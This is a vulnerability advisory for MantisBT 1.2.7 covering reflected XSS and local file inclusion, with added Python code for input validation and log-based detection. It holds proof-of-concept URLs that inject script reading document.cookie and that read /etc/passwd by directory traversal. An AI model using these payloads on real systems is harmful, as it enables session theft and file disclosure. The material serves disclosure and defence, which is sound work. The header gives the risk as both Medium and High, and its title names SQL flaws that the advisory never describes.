MantisBT CMS Multiple Vulnerabilities (SQL/XSS)

Published: 2011.09.22
Credit: High-Tech Bridge SA Security Research Lab
Risk: Medium
CWE: CWE-79, CWE-22
CVE: CVE-2011-3356, CVE-2011-3357, CVE-2011-3358, CVE-2011-3578
Local: No
Remote: Yes

Vulnerability ID: HTB23045
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_mantisbt.html
Product: MantisBT
Vendor: www.mantisbt.org ( http://www.mantisbt.org/ )
Vulnerable Version: 1.2.7 and probably prior
Tested Version: 1.2.7
Vendor Notification: 31 August 2011
Vulnerability Type: Local File Inclusion, XSS
Status: Fixed by Vendor
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in MantisBT, which can be exploited to
perform cross-site scripting and local file inclusion attacks.

1) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php & bug_actiongroup_page.php
is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the
affected website.

The following PoC code is available:

http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php & bug_actiongroup_page.php
is not properly verified before being used to include files.
This can be exploited to include arbitrary files from local resources via directory traversal sequences and URL-encoded
NULL bytes.

http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_/../../../../../../../etc/passwd%00
http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_/../../../../../../../etc/passwd%00
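Issues 1 and 2 share a root cause: the "action" value is both reflected into the page and used to build an include path. The following is an added illustration of how a handler can validate such a value before either use; it is not MantisBT's code or the vendor's fix. The handler directory (ACTION_DIR), the "<name>.php" file naming scheme and the sample action name are assumptions made for this example.

```python
import html
import os
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical directory holding the "EXT_<name>" handler scripts (constructed for this example).
ACTION_DIR = os.path.realpath("bug_actiongroup")

# A well-formed action name is a short token of letters, digits and underscores.
# Traversal sequences, NUL bytes, quotes and angle brackets never match this.
ACTION_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")


def action_from_url(url: str) -> str:
    """Return the URL-decoded 'action' query parameter, as a PHP $_GET lookup would see it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("action", [""])[0]


def resolve_ext_action(action: str):
    """Map an 'EXT_<name>' value to a handler file path, or return None if it is unsafe.

    The value is accepted only when the name matches the allowlist pattern and the
    resolved path still lies inside ACTION_DIR (a second, independent check, so a
    future loosening of the regex cannot silently reintroduce traversal).
    Existence of the file is left to the caller.
    """
    if not action.startswith("EXT_"):
        return None
    name = action[len("EXT_"):]
    if not ACTION_NAME_RE.fullmatch(name):
        return None
    candidate = os.path.realpath(os.path.join(ACTION_DIR, name + ".php"))
    if os.path.commonpath([ACTION_DIR, candidate]) != ACTION_DIR:
        return None
    return candidate


def render_action_field(action: str) -> str:
    """Reflect the action value into a hidden form field with HTML entity escaping."""
    return '<input type="hidden" name="action" value="%s" />' % html.escape(action, quote=True)


if __name__ == "__main__":
    # The two PoC URLs from this advisory, decoded and then rejected by the checks above.
    for url in (
        "http://host/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E",
        "http://host/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_/../../../../../../../etc/passwd%00",
        "http://host/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_UPDATE_SEVERITY",  # assumed benign name
    ):
        value = action_from_url(url)
        print(repr(value), "->", resolve_ext_action(value))
        print(render_action_field(value))
```

The escaping step is what closes issue 1 even for values that never reach the include logic, and the allowlist plus realpath check is what closes issue 2: a NUL byte or "../" cannot survive the regex, and a path that somehow escaped the directory would still fail the commonpath comparison.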

3) Input appended to the URL after manage_config_email_page.php & manage_config_workflow_page.php is not properly
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the
affected website.

http://[host]/manage_config_email_page.php/%22%3E%3Cimg%20src=1%20onerror=%22javascript:alert%28document.cookie%29;%22%3E/
http://[host]/manage_config_workflow_page.php/%22%3E%3Cimg%20src=1%20onerror=%22javascript:alert%28document.cookie%29;%22%3E/

4) Input passed via the "platform", "os" and "os_build" GET parameters to
bug_report_page.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the
affected website.

http://[host]/bug_report_page.php?platform=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Solution: Upgrade to the most recent version
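For sites that cannot upgrade immediately, or that want to check whether the issues above were probed before the fix was applied, the following is an added example of detection logic run over web server access logs. It is not part of the advisory; the log lines are constructed for the example in combined log format and use the PoC URLs listed above, the script names come from issues 1 to 4, and the indicator patterns are assumptions that match those PoCs.

```python
import re
from urllib.parse import unquote

# Scripts named in advisory HTB23045.
TARGET_SCRIPTS = (
    "bug_actiongroup_ext_page.php",
    "bug_actiongroup_page.php",
    "manage_config_email_page.php",
    "manage_config_workflow_page.php",
    "bug_report_page.php",
)

# Indicators checked against the URL-decoded request target (assumed patterns).
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|\x00)")
XSS_RE = re.compile(r"(<script|onerror\s*=|javascript:)", re.IGNORECASE)

# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Sep/2011:10:01:12 +0000] "GET /mantis/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_/../../../../../../../etc/passwd%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Sep/2011:10:01:30 +0000] "GET /mantis/bug_report_page.php?platform=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E HTTP/1.1" 200 9814 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [22/Sep/2011:10:02:05 +0000] "GET /mantis/manage_config_email_page.php/%22%3E%3Cimg%20src=1%20onerror=%22javascript:alert%28document.cookie%29;%22%3E/ HTTP/1.1" 200 7030 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Sep/2011:10:03:44 +0000] "GET /mantis/bug_actiongroup_page.php?bug_arr[]=42&action=UPDATE_SEVERITY HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Sep/2011:10:04:00 +0000] "GET /mantis/view.php?id=42 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
]


def classify_request(target: str):
    """Return ('lfi'|'xss', script) if the decoded target hits an affected script with an indicator, else None."""
    decoded = unquote(unquote(target))  # second pass catches double-encoded payloads; harmless otherwise
    path = decoded.partition("?")[0]
    script = next((s for s in TARGET_SCRIPTS if "/" + s in path), None)
    if script is None:
        return None
    if TRAVERSAL_RE.search(decoded):
        return ("lfi", script)
    if XSS_RE.search(decoded):
        return ("xss", script)
    return None


def scan_log(lines):
    """Parse combined-format lines and return one finding dict per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m.group("target"))
        if verdict is None:
            continue
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("time"),
            "kind": verdict[0],
            "script": verdict[1],
            "status": int(m.group("status")),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%(time)s %(ip)s %(kind)s %(script)s status=%(status)d" % f)
```

Decoding before matching matters because the payloads arrive percent-encoded; the path-info variant of issue 3 is caught because the affected script name is matched anywhere in the decoded path rather than only at its end. A 200 status on an LFI hit is the line worth escalating, since it means the request was served rather than rejected.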

References:

https://github.com/mantisbt/mantisbt/commit/6ede60d3db9e202044f135001589cce941ff6f0f
https://github.com/mantisbt/mantisbt/commit/5b93161f3ece2f73410c296fed8522f6475d273d
https://bugzilla.redhat.com/show_bug.cgi?id=735514
http://www.openwall.com/lists/oss-security/2011/09/04/2
http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066061.html
http://lists.debian.org/debian-security-tracker/2011/09/msg00012.html
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=640297
https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_mantisbt.html
http://www.securityfocus.com/bid/49448
http://www.securityfocus.com/archive/1/archive/1/519547/100/0/threaded
http://www.openwall.com/lists/oss-security/2011/09/09/9
http://www.openwall.com/lists/oss-security/2011/09/04/1
http://www.mantisbt.org/bugs/view.php?id=13281
http://www.debian.org/security/2011/dsa-2308
http://secunia.com/advisories/45961
